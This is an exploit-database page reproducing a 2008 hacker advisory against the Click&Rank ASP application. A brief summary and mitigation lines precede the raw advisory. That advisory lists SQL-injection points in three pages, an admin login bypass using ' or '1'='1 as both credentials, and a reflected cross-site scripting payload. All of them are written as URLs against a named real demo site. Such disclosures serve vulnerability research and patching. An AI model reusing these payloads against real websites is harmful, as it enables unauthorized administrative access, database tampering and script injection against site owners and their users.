Click&Rank

vendor:

Click&Rank

by:

AlpHaNiX

8.8

CVSS

HIGH

SQL Injection, Authentication Bypass, Cross Site Scripting

89, 287, 79

CWE

Product Name: Click&Rank

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

The Click&Rank application is vulnerable to SQL Injection, Authentication Bypass and Cross Site Scripting. An attacker can exploit these vulnerabilities by sending malicious input to the application. For SQL Injection, an attacker can send malicious input to the hitcounter.asp, user_delete.asp and user_update.asp pages. For Authentication Bypass, an attacker can use the username and password as ' or '1'='1. For Cross Site Scripting, an attacker can send malicious input to the user.asp page.

Mitigation:

Input validation should be done to prevent malicious input. Authentication should be done properly and access control should be implemented.

Source

Exploit-DB raw data:

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Click&Rank
#download : null
#Demo     :  http://www.icash.ch/index.html?ClickAndRank/default.asp

###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://www.icash.ch/index.html?ClickAndRank/hitcounter.asp?id=(SQL)
http://www.icash.ch/index.html?ClickAndRank/user_delete.asp?id=(SQL)
http://www.icash.ch/index.html?ClickAndRank/user_update.asp?id=(SQL)

##########################################################################

--=[AUTH BYPASS]=--

http://www.icash.ch/index.html?ClickAndRank/admin.asp

USERNAME  : ' or '1'='1
PASSWORD : ' or '1'='1


##########################################################################

--=[Cross Site Scripting]=--

http://www.icash.ch/index.html?ClickAndRank/user.asp?action=%22%3E%3Cscript%3Ealert(1);%3C/script%3E



#Greetz For My Best Friend ZIGMA

###########################################################################

# milw0rm.com [2008-12-15]